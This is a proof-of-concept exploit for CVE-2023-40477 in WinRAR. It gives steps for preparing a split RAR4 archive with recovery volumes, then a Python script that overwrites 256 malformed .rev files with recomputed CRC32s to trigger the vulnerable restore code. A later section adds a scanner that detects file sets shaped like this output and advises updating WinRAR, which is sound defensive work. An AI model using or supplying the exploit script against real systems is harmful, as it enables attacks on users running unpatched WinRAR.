POC / cve_2023_40477_poc.py
## CVE-2023-40477 PoC By Wild Pointer
## DISCLAIMER: Use at your own responsibility - The publisher, author or any of its affiliates aren't responsible for any actions caused, made or generated by using this code and/or repository.
## This is just & solely for educational purposes and includes demo example only, not to harm or cause any impact. 
## Use this for educational purposes only. Do not use this piece of code for any unethical or unintended behaviour.
'''
1. Using WinRAR < 6.23, create a RAR4 archive with one random file (around 100kb is enough): make it "RAR4" type and enable "Add recovery record".
2. Choose "split to volumes" - you can put "1024B" (to do many splits, but a small number of splits is also enough).
3. In "Advanced" - change recovery record percentage > 20%, make recovery volumes > 40, and select "old name style" in recovery volumes.
4. Remove "archive_name.r01" - i.e. the first volume that has recovery volume - so Restore() will be triggered, i.e. delete "archive_name.r01".
5. Now use the attached code to re-generate malformed "recovery volumes":
'''
import zlib
import struct
ARCHIVE_NAME = 'YOUR_ARCHIVE_NAME_WITHOUT_SUFFIX_HERE' # CHANGE THIS & MAKE SURE YOU ARE IN THE SAME FOLDER AS THE ARCHIVE.

def calculate_crc32(data):
	crc_value = zlib.crc32(data)
	return crc_value & 0xFFFFFFFF

def calc_crc(x):
	res = calculate_crc32(x)
	return struct.pack("<I", res)

# 0. malform .r01 volume
#data = open('%s.r01' % ARCHIVE_NAME, 'rb').read()
#data = data[:0x280] + bytes(0x80) + data[0x300:]
#open('%s.r01' % ARCHIVE_NAME, 'wb').write(data)

# 1. re-generate malformed recovery vols.
with open('%s01.rev' % ARCHIVE_NAME, 'rb') as f:
	data = f.read()
names = ['%s%s.rev' % (ARCHIVE_NAME, str(i).zfill(2)) for i in range(256)]
# Each copy keeps the original body, replaces the 3 bytes before the trailing CRC32 and recomputes that CRC32.
datas = [data[:-7] + bytes([0xf0, 0x00, i]) + calc_crc(data[:-7] + bytes([0xf0, 0x00, i])) for i in range(256)]

# 2. overwrite malformed recovery vols.
for fname, blob in zip(names, datas):
	with open(fname, 'wb') as f:
		f.write(blob)
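
For triage, the files this script writes have a recognisable shape: many `.rev` files with one identical body, a tail of `0xf0, 0x00, n` and a valid little-endian CRC32 over everything before it. The scanner below is an added example, not part of the original PoC; `find_poc_rev_sets`, the `min_files` threshold and the sample file names are assumptions made for illustration.

```python
import hashlib
import struct
import tempfile
import zlib
from pathlib import Path

TRAILER_LEN = 7  # 3 bytes + 4-byte little-endian CRC32, the span the PoC rewrites


def parse_trailer(blob):
    """Return (three_bytes, crc_ok) for the file tail, or None if too short."""
    if len(blob) < TRAILER_LEN:
        return None
    stored = struct.unpack("<I", blob[-4:])[0]
    return blob[-7:-4], stored == (zlib.crc32(blob[:-4]) & 0xFFFFFFFF)


def find_poc_rev_sets(folder, min_files=8):
    """Group CRC-valid .rev files by identical body; report PoC-shaped groups."""
    groups = {}
    for path in sorted(Path(folder).glob("*.rev")):
        blob = path.read_bytes()
        parsed = parse_trailer(blob)
        if parsed is None or not parsed[1]:
            continue  # tail CRC mismatch: not the layout the script writes
        body_hash = hashlib.sha256(blob[:-TRAILER_LEN]).hexdigest()
        groups.setdefault((body_hash, parsed[0][:2]), []).append(path.name)
    # min_files is an assumed threshold; the PoC itself writes 256 files.
    return [names for (_, prefix), names in groups.items()
            if prefix == b"\xf0\x00" and len(names) >= min_files]


def demo():
    """Scan a temp directory holding constructed sample files."""
    def write(path, head):
        path.write_bytes(head + struct.pack("<I", zlib.crc32(head) & 0xFFFFFFFF))
    with tempfile.TemporaryDirectory() as tmp:
        body = bytes(range(64))  # constructed stand-in for a recovery volume body
        for i in range(10):
            write(Path(tmp, "sample%02d.rev" % i), body + bytes([0xF0, 0x00, i]))
        write(Path(tmp, "other01.rev"), b"unrelated body" + bytes([3, 2, 1]))
        return find_poc_rev_sets(tmp)


if __name__ == "__main__":
    print(demo())
```

A hit only means the directory matches what this script produces; a modified generator could use other tail bytes, so updating WinRAR to 6.23 or later remains the fix.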